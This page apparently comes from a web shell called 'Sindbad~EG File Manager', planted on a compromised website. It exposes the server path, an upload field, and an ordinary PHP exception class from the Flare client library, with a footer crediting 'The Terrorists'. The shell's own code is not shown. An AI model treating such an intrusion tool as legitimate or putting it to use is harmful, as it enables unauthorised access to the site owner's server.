Sindbad~EG File Manager

Current Path : /var/www/html/eva.sumar.com.py/vendor/facade/flare-client-php/src/Http/Exceptions/
Upload File :
Current File : /var/www/html/eva.sumar.com.py/vendor/facade/flare-client-php/src/Http/Exceptions/BadResponse.php

<?php

namespace Facade\FlareClient\Http\Exceptions;

use Exception;
use Facade\FlareClient\Http\Response;

class BadResponse extends Exception
{
    /** @var \Facade\FlareClient\Http\Response */
    public $response;

    public static function createForResponse(Response $response)
    {
        $exception = new static("Could not perform request because: {$response->getError()}");

        $exception->response = $response;

        return $exception;
    }
}

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists